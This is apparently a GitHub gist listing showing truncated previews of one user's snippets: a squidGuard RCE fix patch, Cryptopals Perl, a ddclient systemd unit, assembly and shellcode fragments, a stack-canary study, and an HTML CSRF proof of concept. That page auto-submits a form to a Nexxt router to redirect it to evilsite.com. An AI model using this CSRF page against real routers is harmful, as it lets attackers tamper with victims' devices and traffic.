cedriczirtacic / squidguard_pfsense_1.4._7_RCE.patch
Last active May 4, 2016 18:57
Fix for Remote Code Execution (CWE-78) on squidGuard 1.4_7 pfSense package
--- squidguard_blacklist.php.old 2016-05-04 15:01:08.000000000 -0300
+++ squidguard_blacklist.php 2016-05-04 15:46:13.000000000 -0300
@@ -58,11 +58,19 @@
function squidguard_blacklist_AJAX_response( $request )
{
$res = '';
+ $status = '';
$sz = 0;
$pcaption = ' ';
cedriczirtacic / cryptolads.1.1.pl
Last active August 18, 2016 16:30
the cryptopals crypto challenges
#!/bin/env perl
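use strict;
use warnings;

# Cryptopals set 1, challenge 1: read hex strings (one per input line) and
# print each one as Base64, using pack's uuencode template as the encoder.
while ( my $hex_line = <> ) {
    chomp $hex_line;

    # Hex text -> raw bytes.
    my $raw = pack 'H*', $hex_line;

    # pack 'u' splits its output into lines, each starting with a length
    # character and ending with a newline; strip both so only the encoded
    # payload remains.
    my $b64 = pack 'u', $raw;
    $b64 =~ s/(^.|[\n\r])//mg;

    # Translate the uuencode alphabet into the Base64 alphabet.
    $b64 =~ tr#` -_#AA-Za-z0-9+/#;

    # uuencode fills a short final group with filler characters, which the
    # translation above turns into 'A'. Base64 marks those positions with
    # '=', so rewrite them when the byte count is not a multiple of three.
    my $pad = ( 3 - length($raw) % 3 ) % 3;
    substr $b64, -$pad, $pad, '=' x $pad if $pad;

    print $b64, $/;
}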
cedriczirtacic / ddclient.service
Last active October 29, 2023 19:56
Systemd ddclient.service
#/usr/lib/systemd/system/ddclient.service
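[Unit]
Description=ddclient Service
After=network.target
[Service]
# Type=forking together with PIDFile tells systemd to take the main PID from
# the file that ddclient is asked to write via its -pid option.
Type=forking
PIDFile=/var/run/ddclient.pid
ExecStart=/sbin/ddclient -pid /var/run/ddclient.pid -file /etc/ddclient/ddclient.conf -daemon 300
# pkill -P expects a list of parent PIDs, not a path, so it cannot match
# anything when handed the pid file; -F reads the PID from the file instead.
# SIGKILL cannot be caught, so ddclient gets no chance to clean up on stop.
ExecStop=/usr/bin/pkill -SIGKILL -F /var/run/ddclient.pid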
cedriczirtacic / nexxt_exploit1.html
Created September 27, 2016 23:58
Nexxt Solutions Router V5.07.43_en_NEX01 CSRF to URL Redirection
<!-- Demonstration page for the issue named in the gist title: a cross-site
     request to the router's status handler that ends in a redirect.
     The form is submitted by the onload handler, with no user interaction. -->
<body onload='document.forms[0].submit()'>
<!-- The POST goes to a handler on a private LAN address and carries only the
     three fixed fields below: no anti-CSRF token and nothing tied to the
     user's session. NOTE(review): this implies the firmware accepts the
     request from any origin once the browser can reach or is logged in to the
     device; the handler itself is not shown here. -->
<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'>
<input type="hidden" name="CMD" value="WAN_CON" />
<!-- GO carries an absolute URL on another host. Per the gist title this is the
     redirect destination, which suggests the handler does not restrict it to
     same-device paths. Device-side mitigations: require a per-session token
     (or validate Origin/Referer) on state-changing requests, and accept only
     relative, allow-listed redirect targets. -->
<input type="hidden" name="GO" value="http://evilsite.com" />
<input type="hidden" name="action" value='2' />
</form>
</body>
cedriczirtacic / yes.S
Last active June 13, 2017 22:17
yes command in GAS
// gcc -c yes.S -o yes.o && gcc yes.o -o yes
.file "yes.S"
.data
y: .string "y"
.text
.globl main
main:
cmpq $2, %rdi
jl .L1
_start:
xorq %rax, %rax
movb $0x3c, %al
xorq %rdi, %rdi
incb %dil
syscall
#!/usr/bin/perl -w
use strict;
use warnings;
my $bin = $ARGV[0];
my $func= $ARGV[1];
die("./$0 <binary> <function>") if (!defined $bin or !defined $func);
my @shellcode;
.section .text
.global _start
_start:
pushq %rbp
movq %rsp, %rbp
subq $13, %rsp
shellcode:
movb $0x05, -1(%rbp)
movb $0x0f, -2(%rbp)
movb $0xc7, -3(%rbp)
(gdb) disas main
Dump of assembler code for function main:
0x00000000004005ab <+0>: sub $0x18,%rsp
0x00000000004005af <+4>: mov %fs:0x28,%rax
0x00000000004005b8 <+13>: mov %rax,0x8(%rsp)
0x00000000004005bd <+18>: xor %eax,%eax
0x00000000004005bf <+20>: callq 0x400566 <get_canary>
0x00000000004005c4 <+25>: mov (%rax),%rsi
0x00000000004005c7 <+28>: mov $0x400688,%edi
0x00000000004005cc <+33>: mov $0x0,%eax
// gcc -O1 -fstack-protector-all -o main main.c
#include <stdio.h>
#include <linux/types.h>
#ifndef uint64_t
typedef unsigned long uint64_t;
#endif
uint64_t get_canary() {
uint64_t a;